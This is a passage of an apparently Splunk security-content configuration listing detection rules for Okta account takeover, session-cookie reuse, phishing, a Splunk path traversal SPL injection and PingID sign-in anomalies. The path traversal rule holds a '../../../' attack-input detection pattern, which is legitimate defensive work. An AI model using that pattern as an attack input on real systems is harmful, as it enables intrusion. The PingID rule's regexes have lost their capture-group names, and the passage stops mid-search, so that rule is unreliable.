sign-in page and proactively notify Okta customers when suspicious infrastructure we detect appears to be targeting their users. Since March 2020, we have delivered over 1000 notifications to customers. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1556"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies when Okta''s FastPass prevents known phishing sites. When your users are enrolled in FastPass, Okta can provide defenders a high-fidelity signal for when user applications are being targeted by attackers wielding real-time (AiTM) proxies. Okta''s Defensive Cyber Operations team routinely identifies phishing infrastructure configured to imitate an Okta sign-in page and proactively notify Okta customers when suspicious infrastructure we detect appears to be targeting their users. Since March 2020, we have delivered over 1000 notifications to customers. action.escu.how_to_implement = This search is specific to Okta and requires Okta logs to be ingested in your Splunk deployment. action.escu.known_false_positives = Fidelity of this is high as Okta is specifying malicious infrastructure. Filter and modify as needed. action.escu.creation_date = 2023-03-09 action.escu.modification_date = 2023-03-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Phishing Detection with FastPass Origin Check - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = Okta FastPass has prevented $user$ from authenticating to a malicious site. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Okta Phishing Detection with FastPass Origin Check - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1556"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when Okta''s FastPass prevents known phishing sites. When your users are enrolled in FastPass, Okta can provide defenders a high-fidelity signal for when user applications are being targeted by attackers wielding real-time (AiTM) proxies. Okta''s Defensive Cyber Operations team routinely identifies phishing infrastructure configured to imitate an Okta sign-in page and proactively notify Okta customers when suspicious infrastructure we detect appears to be targeting their users. Since March 2020, we have delivered over 1000 notifications to customers. action.notable.param.rule_title = Okta Phishing Detection with FastPass Origin Check action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType="user.authentication.auth_via_mfa" AND result="FAILURE" AND outcome.reason="FastPass declined phishing attempt" | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user eventType client.userAgent.rawUserAgent client.userAgent.browser outcome.reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_phishing_detection_with_fastpass_origin_check_filter` [ESCU - Okta Risk Threshold Exceeded - Rule] action.escu = 0 action.escu.enabled = 1 description = This correlation computes the risk events associated with the detection analytics from "Suspicious Okta Activity", "Okta Account Takeover", and "Okta MFA Exhaustion" analytic stories. This analytic will trigger a notable event in your incident review when there are 5 or more distinct TTPs related to these analytic stories in the last 24 hours. This incident highlights potentially suspicious activity by a compromised user. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1110"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = This correlation computes the risk events associated with the detection analytics from "Suspicious Okta Activity", "Okta Account Takeover", and "Okta MFA Exhaustion" analytic stories. This analytic will trigger a notable event in your incident review when there are 5 or more distinct TTPs related to these analytic stories in the last 24 hours. This incident highlights potentially suspicious activity by a compromised user. action.escu.how_to_implement = This search leverages the Risk Framework from Enterprise Security. Ensure that "Suspicious Okta Activity", "Okta Account Takeover", and "Okta MFA Exhaustion" analytic stories are enabled. TTPs may be set to Notables for point detections; anomalies should not be notables but rather risk generators. The correlation relies on risk before generating a notable. Modify the value as needed. action.escu.known_false_positives = False positives will be limited to the number of events generated by the analytics tied to the stories. Analytics will need to be tested and tuned, and the risk score reduced as needed based on the organization. action.escu.creation_date = 2024-04-02 action.escu.modification_date = 2024-04-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Risk Threshold Exceeded - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover", "Okta MFA Exhaustion", "Suspicious Okta Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Okta Risk Threshold Exceeded - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover", "Okta MFA Exhaustion", "Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1110"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This correlation computes the risk events associated with the detection analytics from "Suspicious Okta Activity", "Okta Account Takeover", and "Okta MFA Exhaustion" analytic stories. This analytic will trigger a notable event in your incident review when there are 5 or more distinct TTPs related to these analytic stories in the last 24 hours. This incident highlights potentially suspicious activity by a compromised user. action.notable.param.rule_title = RBA: Okta Risk Threshold Exceeded action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(All_Risk.analyticstories) as analyticstories sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count,values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.risk_object_type = user All_Risk.analyticstories IN ("Okta Account Takeover", "Suspicious Okta Activity","Okta MFA Exhaustion") by All_Risk.risk_object,All_Risk.risk_object_type | `drop_dm_object_name("All_Risk")` | search mitre_technique_id_count > 5 | `okta_risk_threshold_exceeded_filter` [ESCU - Okta Successful Single Factor Authentication - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies successful authentication events against the Okta Dashboard for accounts without Multi-Factor Authentication enabled. It specifically searches for events where "Okta Verify" is not detected during authentication. This could indicate a misconfiguration, a policy violation, or an account takeover attempt that warrants investigation. If your organization has other authenticators configured in the environment, consider excluding those from the "targets" in the detection search. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies successful authentication events against the Okta Dashboard for accounts without Multi-Factor Authentication enabled. It specifically searches for events where "Okta Verify" is not detected during authentication. This could indicate a misconfiguration, a policy violation, or an account takeover attempt that warrants investigation. If your organization has other authenticators configured in the environment, consider excluding those from the "targets" in the detection search. action.escu.how_to_implement = This detection utilizes logs from Okta environments and requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = Although not recommended, certain users may be exempt from multi-factor authentication. Adjust the filter as necessary. action.escu.creation_date = 2024-04-08 action.escu.modification_date = 2024-04-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Successful Single Factor Authentication - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A user [$user$] has successfully logged in to Okta Dashboard with single factor authentication from IP Address - [$src_ip$]. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Successful Single Factor Authentication - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` action=success src_user_type = User eventType = user.authentication.verify OR eventType = user.authentication.auth_via_mfa| stats dc(eventType) values(eventType) as eventType values(target{}.displayName) as targets values(debugContext.debugData.url) min(_time) as firstTime max(_time) as lastTime values(authentication_method) by src_ip user action | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search targets !="Okta Verify" | `okta_successful_single_factor_authentication_filter` [ESCU - Okta Suspicious Activity Reported - Rule] action.escu = 0 action.escu.enabled = 1 description = This event is generated when an associate receives an email from Okta inquiring whether a login attempt was suspicious. If the associate deems it suspicious, an event is generated for review. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This event is generated when an associate receives an email from Okta inquiring whether a login attempt was suspicious. If the associate deems it suspicious, an event is generated for review. action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). Additionally, it necessitates the activation of suspicious activity reporting and training for associates to report such activities. action.escu.known_false_positives = False positives should be minimal, given the high fidelity of this detection. marker. action.escu.creation_date = 2022-09-21 action.escu.modification_date = 2022-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Suspicious Activity Reported - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A user [$user$] reported suspicious activity in Okta. Investigate further to determine if this was authorized. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Suspicious Activity Reported - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This event is generated when an associate receives an email from Okta inquiring whether a login attempt was suspicious. If the associate deems it suspicious, an event is generated for review. action.notable.param.rule_title = Okta Suspicious Activity Reported action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType=user.account.report_suspicious_activity_by_enduser | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by user eventType client.userAgent.rawUserAgent client.userAgent.browser client.geographicalContext.city client.geographicalContext.country | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_suspicious_activity_reported_filter` [ESCU - Okta Suspicious Use of a Session Cookie - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where multiple client attributes (such as IP, User Agent, etc.) associated with the same Device Token change for a specific user. It aims to detect scenarios where an adversary might attempt to reuse a stolen web session cookie. \ * It retrieves policy evaluation events from successful authentication attempts. \ * It aggregates and groups these events by Device Token and User, providing the first policy evaluation event within the search window. \ * It checks for the presence of more than one IP and whether there are multiple OS or browsers for each User/Device Token combination. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1539"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies instances where multiple client attributes (such as IP, User Agent, etc.) associated with the same Device Token change for a specific user. It aims to detect scenarios where an adversary might attempt to reuse a stolen web session cookie. \ * It retrieves policy evaluation events from successful authentication attempts. \ * It aggregates and groups these events by Device Token and User, providing the first policy evaluation event within the search window. \ * It checks for the presence of more than one IP and whether there are multiple OS or browsers for each User/Device Token combination. action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = False positives may occur, depending on the organization's size and the configuration of Okta. action.escu.creation_date = 2024-03-17 action.escu.modification_date = 2024-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Suspicious Use of a Session Cookie - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity", "Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A user [$user$] is attempting to use a session cookie from multiple IP addresses or devices. Investigate further to determine if this was authorized. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Suspicious Use of a Session Cookie - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity", "Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1539"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType IN (policy.evaluate_sign_on) outcome.result IN (ALLOW, SUCCESS) | stats earliest(_time) as _time, values(client.ipAddress) as src_ip, values(client.userAgent.rawUserAgent) as user_agent, values(client.userAgent.os) as userAgentOS_list, values(client.geographicalContext.city) as city, values(client.userAgent.browser) as userAgentBrowser_list, values(device.os_platform) as okta_device_os, dc(client.userAgent.browser) as dc_userAgentBrowser, dc(client.userAgent.os) as dc_userAgentOS, dc(client.ipAddress) as dc_src_ip, values(outcome.reason) as reason by debugContext.debugData.dtHash, user | where dc_src_ip>1 AND (dc_userAgentOS>1 OR dc_userAgentBrowser>1) | `okta_suspicious_use_of_a_session_cookie_filter` [ESCU - Okta ThreatInsight Threat Detected - Rule] action.escu = 0 action.escu.enabled = 1 description = This anomaly is based on the identification of threats by Okta ThreatInsight. It allows for the escalation of risk based on src_ip or the addition of fields for further tracking. Possible identifications include password spraying, login failures, and login failures with a high count of unknown users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This anomaly is based on the identification of threats by Okta ThreatInsight. It allows for the escalation of risk based on src_ip or the addition of fields for further tracking. Possible identifications include password spraying, login failures, and login failures with a high count of unknown users. action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = False positives may occur. It is recommended to fine-tune Okta settings and the analytic to ensure high fidelity. Adjust the risk score as necessary. action.escu.creation_date = 2022-09-21 action.escu.modification_date = 2022-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta ThreatInsight Threat Detected - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = The following $src_ip$ has been identified as a threat by Okta ThreatInsight. Investigate further to determine if this was authorized. action.risk.param._risk = [{"risk_object_field": "app", "risk_object_type": "system", "risk_score": 25}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta ThreatInsight Threat Detected - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType = security.threat.detected | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | stats count min(_time) as firstTime max(_time) as lastTime by app src_ip signature eventType displayMessage client.device city state country user_agent outcome.reason outcome.result severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_threatinsight_threat_detected_filter` [ESCU - Okta Unauthorized Access to Application - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects instances where a user attempts to access an Okta application that has not been assigned to them. Such unauthorized access to applications poses a significant security risk, potentially leading to the exposure of sensitive information, disruption of services, and breaches of data protection laws. Ensuring that only authorized users have access to applications is crucial for maintaining a secure and compliant IT environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.004"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search detects instances where a user attempts to access an Okta application that has not been assigned to them. Such unauthorized access to applications poses a significant security risk, potentially leading to the exposure of sensitive information, disruption of services, and breaches of data protection laws. Ensuring that only authorized users have access to applications is crucial for maintaining a secure and compliant IT environment. action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments and requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = There is a possibility that a user may accidentally click on the wrong application, which could trigger this event. It is advisable to verify the location from which this activity originates. action.escu.creation_date = 2024-03-07 action.escu.modification_date = 2024-03-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Unauthorized Access to Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A user [$user$] is attempting to access an unauthorized application from IP Address - [$src$] action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta Unauthorized Access to Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats values(Authentication.app) as app values(Authentication.action) as action values(Authentication.user) as user values(Authentication.reason) as reason from datamodel=Authentication where Authentication.signature=app.generic.unauth_app_access_attempt Authentication.action="failure" by _time Authentication.src Authentication.user | `drop_dm_object_name("Authentication")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | iplocation src | `okta_unauthorized_access_to_application_filter` [ESCU - Okta User Logins from Multiple Cities - Rule] action.escu = 0 action.escu.enabled = 1 description = This search identifies instances where the same user logs in from different cities within a 24-hour period, potentially indicating a compromised account. Such behavior may be indicative of an attacker attempting to gain unauthorized access to an Okta account from multiple locations. Investigating and responding to such incidents promptly is crucial to prevent account takeovers and data breaches. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1586.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search identifies instances where the same user logs in from different cities within a 24-hour period, potentially indicating a compromised account. Such behavior may be indicative of an attacker attempting to gain unauthorized access to an Okta account from multiple locations. Investigating and responding to such incidents promptly is crucial to prevent account takeovers and data breaches. action.escu.how_to_implement = This detection utilizes logs from Okta Identity Management (IM) environments. It requires the ingestion of OktaIm2 logs through the Splunk Add-on for Okta Identity Cloud (https://splunkbase.splunk.com/app/6553). action.escu.known_false_positives = It is uncommon for a user to log in from multiple cities simultaneously, which may indicate a false positive. action.escu.creation_date = 2024-03-07 action.escu.modification_date = 2024-03-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta User Logins from Multiple Cities - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Okta Account Takeover"] action.risk = 1 action.risk.param._risk_message = A user [$user$] has logged in from multiple cities [$City$] from IP Address - [$src$]. Investigate further to determine if this was authorized. action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Okta User Logins from Multiple Cities - Rule action.correlationsearch.annotations = {"analytic_story": ["Okta Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1586.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Authentication.app) as app values(Authentication.action) as action values(Authentication.user) as user values(Authentication.reason) as reason values(Authentication.dest) as dest values(Authentication.signature) as signature values(Authentication.method) as method from datamodel=Authentication where Authentication.signature=user.session.start by _time Authentication.src | `drop_dm_object_name("Authentication")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | iplocation src | stats count min(_time) as firstTime max(_time) as lastTime dc(src) as distinct_src dc(City) as distinct_city values(src) as src values(City) as City values(Country) as Country values(action) as action by user | where distinct_city > 1 | `okta_user_logins_from_multiple_cities_filter` [ESCU - Path traversal SPL injection - Rule] action.escu = 0 action.escu.enabled = 1 description = On May 3rd, 2022, Splunk published a security advisory for a Path traversal in search parameter that can potentiall allow SPL injection. An attacker can cause the application to load data from incorrect endpoints, urls leading to outcomes such as running arbitrary SPL queries. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = On May 3rd, 2022, Splunk published a security advisory for a Path traversal in search parameter that can potentiall allow SPL injection. An attacker can cause the application to load data from incorrect endpoints, urls leading to outcomes such as running arbitrary SPL queries. action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. This search will provide search UI requests with path traversal parameter ("../../../../../../../../../") which shows exploitation attempts. This detection is meant for on premise environments, and if executed on internet facing servers without a WAF may produce a lot of results. This detection will not work against obfuscated path traversal requests. action.escu.known_false_positives = This search may find additional path traversal exploitation attempts. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Path traversal SPL injection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = Path traversal exploitation attempt from $clientip$ action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 40}, {"threat_object_field": "clientip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Path traversal SPL injection - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-26889"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1083"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = On May 3rd, 2022, Splunk published a security advisory for a Path traversal in search parameter that can potentiall allow SPL injection. An attacker can cause the application to load data from incorrect endpoints, urls leading to outcomes such as running arbitrary SPL queries. action.notable.param.rule_title = Path traversal SPL injection action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `path_traversal_spl_injection` | search "\/..\/..\/..\/..\/..\/..\/..\/..\/..\/" | stats count by host status clientip method uri_path uri_query | `path_traversal_spl_injection_filter` [ESCU - PingID Mismatch Auth Source and Verification Response - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies variations in the authentication event IP address versus the verification response event IP address to identify suspicious sign-in behavior. Currently this detection is configured to identify when the originating country of an authentication request is different than the verification country. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies variations in the authentication event IP address versus the verification response event IP address to identify suspicious sign-in behavior. Currently this detection is configured to identify when the originating country of an authentication request is different than the verification country. action.escu.how_to_implement = Target environment must ingest JSON logging from a PingID(PingOne) enterprise environment, either via Webhook or Push Subscription. action.escu.known_false_positives = False positives may be generated by users working out the geographic region where the organizations services or technology is hosted. action.escu.creation_date = 2023-09-26 action.escu.modification_date = 2023-09-26 action.escu.confidence = high action.escu.full_search_name = ESCU - PingID Mismatch Auth Source and Verification Response - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Ping ID"] action.escu.analytic_story = ["Compromised User Account"] action.risk = 1 action.risk.param._risk_message = An authentication by [$user$] was detected from [$dest$ - $auth_Country$] and the verification was received from [$src$ - $verify_Country$]. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "src", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "object", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PingID Mismatch Auth Source and Verification Response - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1621", "T1556.006", "T1098.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies variations in the authentication event IP address versus the verification response event IP address to identify suspicious sign-in behavior. Currently this detection is configured to identify when the originating country of an authentication request is different than the verification country. action.notable.param.rule_title = PingID Mismatch Auth Source and Verification Response action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `pingid` ("result.status" IN ("SUCCESS*","FAIL*","UNSUCCESSFUL*") NOT "result.message" IN ("*pair*","*create*","*delete*")) | eval user = upper('actors{}.name'), session_id = 'resources{}.websession', dest = 'resources{}.ipaddress', reason = 'result.message', object = 'resources{}.devicemodel', status = 'result.status' | join user session_id [ search `pingid` ("result.status" IN ("POLICY") AND "resources{}.ipaddress"=*) AND "result.message" IN("*Action: Authenticate*","*Action: Approve*","*Action: Allowed*") | rex field=result.message "IP Address: (?:N\/A)?(?.+)?\n" | rex field=result.message "Action: (?:N\/A)?(?.+)?\n" | rex field=result.message "Requested Application Name: (?:N\/A)?(?.+)?\n" | rex field=result.message "Requested Application ID: (?:N\/A)?(?.+)?\n" | eval user = upper('actors{}.name'), session_id = 'resources{}.websession', src = 